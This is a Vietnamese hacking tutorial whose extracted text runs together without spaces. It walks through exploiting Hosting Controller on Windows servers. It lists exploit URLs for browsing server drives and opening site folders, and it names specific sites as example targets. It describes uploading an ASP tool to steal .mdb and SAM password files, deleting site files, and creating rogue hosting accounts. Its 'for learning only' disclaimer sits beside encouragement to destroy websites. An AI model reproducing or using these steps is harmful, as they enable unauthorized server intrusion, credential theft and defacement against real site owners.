Hack Server NT qua bug Hosting Controller

Hôm nay tôi sẽ hướng dẫn các bạn cách hack Server và Website qua lỗi Hosting Controller !Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới (theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa sửa lỗi này) bị lỗi Hostingcontroller.Chú ý : Tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên phá hoại làm ảnh hưởng đến nhiều người ....
Nội dung trích xuất từ tài liệu:
Hack Server NT qua bug Hosting ControllerHackServerNTquabugHostingControllertrangnàyđãđượcđọc lầnHômnaytôisẽhướngdẫncácbạncáchhackServervàWebsitequalỗiHostingController!Nhưcácbạnđãthấyhiệngiờđãxuấthiệnrấtnhiềumáychủtrênthếgiới(theotôikiểmtravàthửnghiệmtrên12serverhiệngiờvẫnchưasửalỗinày)bịlỗiHostingcontroller.Chúý:Tôiviếtbàinàychỉđểcácbạnhọchỏi.NếucóHackthìchỉnênthêm1filevàotrongwebsiteđểchứngtỏlàmìnhđãHack.Khôngnênpháhoạilàmảnhhưởngđếnnhiềungười.+LỗiHClàlỗicủaphầnmềmHostingControllerdùngđểquảnlýServercungcấpDomainvàHostingchokháchhàngthườngđượcchạydướiWin2000/NT.TôisẽHackqualỗiHCvàsẽvídụvới1serverchưafixđólàserverchứa38sitemàđãđượcHackerForumHackedvàothángtrước.+LỗiHCchobạnthựchiện1dònglệnhđểđọcổcứng(C;D;E)thậmchícảổAcủaserverqua1sitehoặctrựctiếpbằngIDcủaserver.LỗiHCthựcchấtlàbịlỗicủa4filenằmtrongphầnmềmlà:statsbrowse.asp;servubrowse.asp;browsedisk.asp;browsewebalizerexe.asp; sqlbrowse.aspTôisẽviếtcấutrúccủalệnhHackvàoservernhờlỗi4filenày:..................TrongđóHCcóthểlà:admin;advadmin;hostingcontrollerLỗiđầutiêntôigiớithiệuvớicácbạncótênMultiplesecurityvulnerabilities.ĐâylàcácđoạnScriptchophépbạnduyệtbấtcứfilenàotrênServer:http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:&Opt=3TrongđóVictimlàServerbịlỗiHCmàbạnmuốnHackVídụ:cáchHackserverqua1sitenằmtrongserver(haycòngọilàHacklocalexploit)VD:sitenàyđãbịHackerForumhack:http://123hollywood.com/hf.htmởthanhAddressbạnđánh1trongcácdònglệnhsau:http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:&Opt=3http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:&Opt=3http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:&Opt=3http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:&Opt=3http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:&Opt=3LúcnầybạnsẽvàođượcphầnBrowserDirectories.ĐâylàtoànbộcấutrúccủaWebsiteđó.KhicácbạnđãvàođượcbêntrongcủaổC:ạnthấycóthưmụcwebsites(đốivớiserverđangthửnghiệmnày,cònđốivớicácserverkhácthìnóthườngnằmởổD:).NếubạnđãthấythìOK.Bạnhãyvàotrongvàthấy1loạtcácwebsite.VớiserverchúngtađangHackởtrênbạnsẽthấycácwebsiteđượcđưavàocácthưmụcriênglẻtheovần.ChúngtahãytìmtớiwebsitemànhờnóchúngtavàođượcServernày.Bạnhãyvào123web/123kinh/123hollywood.com/www/.Bạnthấyđócựckỳđơngiảnđúngkhông.SaukhibiếtđượcđườngdẫncủasitecầnHackthìbạndùngScriptsau:http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:webspace esadmin esting esting.comwww.......... ThayexamplebằngtêncủaServervàtestingbằngtêntrangWebmuốnHackVídụ:BạnđăngkýWebsitetêncuonglongcủaFPTthìtụiFPTsẽchobạnmộtnơiđểtrangWeb:c:webspace esadmincuonglongcuonglong.comwww MuốnHacktrangnàythìbạnđánhScriptnhưtrên:http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuonglong.com&OpenPath=C:webspace esadmincuonglongcuonglong.comwww.......... VậylàbạnđãvàođượccấutrúcthưmụccủaWebđónhưnglúcnàybạnchỉquyềnupload1filenàođótừổcứngcủabạnlênsiteđóthôiSauđóbạnuploadfilentdaddy.aspWebsiteđó.VàchạyfilenàytrênWebsiteđóđểlấynhữngfile*.mdbvà*.SAMvề,đâylàfilechứapassword,bạnchỉviệcgiảimãraVậylàbạnđãHackđượcWebsiteđórồiBâygiờtôisẽhướngdẫncácbạncáchuploadvàxoáfiletrêncácsitenày:Cáinàythìcũngcựckỳđơngiản,bạnhãyxemmẫusau:http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:/webspace/.. rongđótestinglàcácđườngdẫnvàowebsitemàbạnmuốnupload.Bâygiờthìbạncóthểnghịchthoảimái;Bạncóthểchotoànbộwebsitecủahọchếtngaytạichỗ.Còn1vàilỗinữacủaHC,trongđócólỗichophépbạncókhảnăngkhởitạochomình1hostingtrongservernhờdònglệnhsau:http://victim.com/admin/autosignup/dsp_newwebadmin.aspCũngnhưtrên,VictimlàServerbịlỗiHCmàbạnmuốnHack.VídụđólàWebsitehttp://bigguy.ourweb.net/http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.aspMìnhđãkhởitạocáinày,cácbạnvôxem ...